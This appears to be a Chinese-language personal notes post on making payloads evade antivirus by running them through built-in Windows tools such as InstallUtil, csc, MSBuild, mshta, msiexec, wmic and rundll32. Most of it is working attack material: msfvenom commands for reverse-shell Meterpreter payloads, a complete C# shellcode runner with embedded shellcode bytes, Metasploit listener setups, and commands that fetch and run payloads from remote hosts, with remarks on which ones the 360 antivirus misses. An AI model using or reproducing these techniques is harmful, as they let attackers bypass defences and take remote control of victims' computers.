payload免杀之Installutil.exe&csc.exe利用【自己win7机器复现ok】 我下载的.net framework是4.8 不是最新的哈 最新的没有v2 csc.exe
payload免杀之Installutil.exe&csc.exe利用
C#的在Windows平台下的编译器名称是Csc.exe。Installutil.exe工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,可以执行dll,exe,txt等。这两个东西一般情况下是配合使用。所以就不单独拿出来讲了。
0x01 利用过程
1.下载shellcode.cs
wget https://github.com/222222amor/exp_notes/blob/master/InstallUtil-Shellcode-cs
我这里使用cobalt strike的shellcode,你也可以使用msf的shellcode,命令如下:
msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp > pentestShellCode.txt
我自己生成的:
byte[] buf = new byte[559] { 0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x89,0xe5,0x64,0x8b,0x52,0x30, 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x8b,0x72,0x28, 0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49, 0x75,0xef,0x52,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x57,0x01,0xd0,0x8b,0x40,0x78, 0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x48,0x18,0x50,0x8b,0x58,0x20,0x01,0xd3, 0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xc1, 0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24, 0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c, 0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59, 0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d, 0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26, 0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0xe8,0x75,0x00,0x00,0x00, 0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x4d,0x61, 0x63,0x69,0x6e,0x74,0x6f,0x73,0x68,0x3b,0x20,0x49,0x6e,0x74,0x65,0x6c,0x20, 0x4d,0x61,0x63,0x20,0x4f,0x53,0x20,0x58,0x20,0x31,0x32,0x5f,0x32,0x5f,0x31, 0x29,0x20,0x41,0x70,0x70,0x6c,0x65,0x57,0x65,0x62,0x4b,0x69,0x74,0x2f,0x36, 0x30,0x35,0x2e,0x31,0x2e,0x31,0x35,0x20,0x28,0x4b,0x48,0x54,0x4d,0x4c,0x2c, 0x20,0x6c,0x69,0x6b,0x65,0x20,0x47,0x65,0x63,0x6b,0x6f,0x29,0x20,0x56,0x65, 0x72,0x73,0x69,0x6f,0x6e,0x2f,0x31,0x35,0x2e,0x32,0x20,0x53,0x61,0x66,0x61, 0x72,0x69,0x2f,0x36,0x30,0x35,0x2e,0x31,0x2e,0x31,0x35,0x00,0x68,0x3a,0x56, 0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,0x53,0x53,0x68,0x5c,0x11,0x00,0x00, 0xe8,0xcf,0x00,0x00,0x00,0x2f,0x71,0x30,0x53,0x7a,0x48,0x50,0x38,0x6b,0x57, 0x41,0x6c,0x32,0x6c,0x58,0x65,0x55,0x46,0x62,0x55,0x35,0x70,0x41,0x47,0x6c, 0x75,0x76,0x52,0x36,0x4f,0x68,0x2d,0x64,0x53,0x39,0x65,0x6d,0x6b,0x58,0x63, 0x61,0x4d,0x4d,0x68,0x32,0x73,0x41,0x79,0x76,0x76,0x78,0x61,0x58,0x57,0x36, 0x5f,0x50,0x4e,0x48,0x62,0x6d,0x44,0x66,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6, 0xff,0xd5,0x89,0xc6,0x53,0x68,0x00,0x32,0xe8,0x84,0x53,0x53,0x53,0x57,0x53, 0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0x0a,0x5f,0x68,0x80,0x33, 0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86, 0xff,0xd5,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85, 0xc0,0x75,0x14,0x68,0x88,0x13,0x00,0x00,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5, 0x4f,0x75,0xcd,0xe8,0x4c,0x00,0x00,0x00,0x6a,0x40,0x68,0x00,0x10,0x00,0x00, 0x68,0x00,0x00,0x40,0x00,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53, 0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89, 0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5, 0x58,0xc3,0x5f,0xe8,0x6b,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38, 0x2e,0x31,0x35,0x37,0x2e,0x31,0x32,0x38,0x00,0xbb,0xf0,0xb5,0xa2,0x56,0x6a, 0x00,0x53,0xff,0xd5 };
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST xx.xxx.xxx.xxx
set LPORT 443
set ExitOnSession false
run -j
2.编译并执行 ==》有问题,需要i下载其他源码配合,见后!!!
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe InstallUtil-ShellCode.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
或者 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
绕过的流程图
但是现实很骨感。已经被某60杀了。
再或者就是你过了
补充:
https://micro8.gitbook.io/micro8/contents-1/71-80/77-ji-yu-bai-ming-dan-csc.exe-zhi-hang-payload-di-qi-ji
csc /target:exe test.cs
将Ttest.cs 编译成名为 test.exe 的 console 应用程序免杀学习之使用msbuild来执行payload
什么是msbuild
msbuild是Microsoft和Visual Studio的生成系统,简单地说,这个就是用来编译你的项目,也就是所谓的编译器。MSBuild可在未安装Visual Studio的环境中编译.net的工程文件,MSBuild可可以编译特定格式的xml文件。总结来说msbuild可以编译执行csharp代码。
存储路径
加载32位的shellcode需要32位的msbuild
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
加载64位的shellcode需要64位的msbuild
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
生成shellcode并执行
这里面我们使用msf来生成64位shellcode(没有32位的机器,尴尬QAQ)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.22.1 lport=12345 -f csharp
使用别人的模板
https://github.com/3gstudent/msbuild-inline-task.git
使用executes x64 shellcode.xml这个模板(我是64位的机器),将45行的shellcode改为msf生成的shellcode(注意变量名)
msf设置为监听状态
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.1.130
set LPORT 4444
set ExitOnSession false
set autorunscript migrate -n explorer.exe
exploit -j
然后在目标机器上执行
C:\Windows\Microsoft.NET\Framework64\v4.0.30319>MSBuild.exe "C:\Users\jack.0DAY\Desktop\exec.xml"
后记:win10有内存保护,不允许写进shellcode。这里面我的win7和win2008是没有v4.0.30319
这个目录的,其他的目录虽然也有msbuild但是用不了,编译的时候报错。
暂时没有使用成功。
installutil.exe和csc.exe的使用【实践OK】
什么是installutil
installer工具是一个命令行实用工具,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用。(应该是c#)
使用msf生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.22.1 lport=12345 -f csharp
下载别人的Installutil-shellcode的cs文件,将里面的shellcode替换为我们的。
替换后的效果:
using System; using System.Net; using System.Diagnostics; using System.Reflection; using System.Configuration.Install; using System.Runtime.InteropServices; /* Author: Casey Smith, Twitter: @subTee License: BSD 3-Clause Step One: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe Shellcode.cs Step Two: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe (Or) C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe The gist of this one is we can exhibit one behaviour if the application is launched via normal method, Main(). Yet, when the Assembly is launched via InstallUtil.exe, it is loaded via Reflection and circumvents many whitelist controls. We believe the root issue here is: The root issue here with Assembly.Load() is that at the point at which execute operations are detected (CreateFileMapping->NtCreateSection), only read-only access to the section is requested, so it is not processed as an execute operation. Later, execute access is requested in the file mapping (MapViewOfFile->NtMapViewOfSection), which results in the image being mapped as EXECUTE_WRITECOPY and subsequently allows unchecked execute access. The concern is this technique can circumvent many security products, so I wanted to make you aware and get any feedback. Its not really an exploit, but just a creative way to launch an exe/assembly. */ //root@infosec:~# msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp > pentestShellCode.txt public class Program { public static void Main() { Console.WriteLine("Hello From Main...I Don't Do Anything"); //Add any behaviour here to throw off sandbox execution/analysts :) } } [System.ComponentModel.RunInstaller(true)] public class Sample : System.Configuration.Install.Installer { //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. public override void Uninstall(System.Collections.IDictionary savedState) { Shellcode.Exec(); } } public class Shellcode { public static void Exec() { // native function's compiled code // generated with metasploit byte[] shellcode = new byte[354] { 0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30, 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x8b,0x72,0x28, 0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49, 0x75,0xef,0x52,0x8b,0x52,0x10,0x57,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78, 0x85,0xc0,0x74,0x4c,0x01,0xd0,0x50,0x8b,0x58,0x20,0x01,0xd3,0x8b,0x48,0x18, 0x85,0xc9,0x74,0x3c,0x49,0x31,0xff,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xc1, 0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24, 0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c, 0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59, 0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d, 0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26, 0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68, 0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0x9d,0x80,0x68,0x02, 0x00,0x30,0x39,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea, 0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61, 0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00, 0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83, 0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a, 0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57, 0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00, 0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68, 0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff, 0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb, 0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 }; UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; // prepare data IntPtr pinfo = IntPtr.Zero; // execute native code hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); } private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType); [DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); [DllImport("kernel32")] private static extern bool CloseHandle(IntPtr handle); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds ); [DllImport("kernel32")] private static extern IntPtr GetModuleHandle( string moduleName ); [DllImport("kernel32")] private static extern UInt32 GetProcAddress( IntPtr hModule, string procName ); [DllImport("kernel32")] private static extern UInt32 LoadLibrary( string lpFileName ); [DllImport("kernel32")] private static extern UInt32 GetLastError(); }
使用csc编译
csc就是一个自带的c#的编译器
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:D:\test\InstallUtil-shell.exe D:\test\InstallUtil-ShellCode.cs
后记:生成的后缀可以自定义,但是需要用installutil来使用
使用installUtil来执行二进制文件
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U D:\test\InstallUtil-shell.exe

成功会反弹shell.但是360会拦截下来,需要点同意。emmmm
regasm和regsvcs的使用【无文件攻击,todo】
两者的使用方式是一样的,并且于上文是相同的
- 同样需要下载一些东西
- msf中生成shellcode,并放入cs文件中
- 编译(使用csc编译,不过必须编译为dlll才可以)
- 执行(使用regasm和regsvcs)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs
执行
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe 1.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe 1.dll
或者
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U 1.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U 1.dll
这里面我们没有签名工具sn,暂时先放着吧
使用mshta
这个就比较好利用了,因为这个是在环境变量里面的。
- msf生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.22.1 lport=12345 ‐f raw > shellcode.bin
- shellcode进行base64加密
cat shellcode.bin | base64 -w 0
将' ---------- DO NOT EDIT BELOW HERE -----------
上面包起来的base64替换掉。
web服务部署一下
目标机上执行 mshta.exe http://xxx/shellcode.hta
NB,直接上线,360没有任何反应!!!!
cobal strike中也有这个功能
使用Msiexec
Msiexec是Windows Installer的一部分,用于安装Windows Installer安装包(MSI),一般在运行 Microsoft Update 安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于 Windows 2003,Windows 7 等。
Msiexec已经被添加到了环境变量里面了。
- msf生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.22.1 lport=12345 ‐f msi > shellcode.txt
- 目标机器执行命令
msiexec.exe /q /i http://192.168.22.1:12345/shellcode.txt
后记:360会拦截。提示msi下载攻击
wmic
已经在环境变量里面了
wmic os get /FORMAT:"http://example.com/evil.xsl"
poc
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> </ms:script>
</stylesheet>
扩展
https://3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4%BB%B6%E7%9A%84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/
后记:360会拦截,说是wmic攻击
利用Rundll32.exe
Rundll32.exe是指"执行32位的DLL文件"。它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。已经加入环境变量。
- 执行自定义的
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
后记:会被拦截
使用shellcode loader
借助第三方加载器,将shellcode加载到内存中来执行。
- msf生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_ga_nai -i 5 -f raw > test.c
靶机执行
shellcode_launcher.exe -i test.c
靶机上线
后记:360并不会拦截。有点厉害。
使用偏僻语言(py和go等等)
使用偏僻语言的好处就在于,让杀软识别不了程序的pe头。
- msf生成py木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.22.1 lport=12345 -e x86/shikata_ga_nai -i 5 -f py -o shellcode.py
- 使用pyinstaller打包
pyinstaller -F --console shellcode.py
没有这个的话就 pip install pyinstaller
安装一下
这里面有个坑,你用什么系统编译的就只能在上面系统上执行.
点击生成的二进制文件.木马上线。
使用Go语言
暂时没整这个环境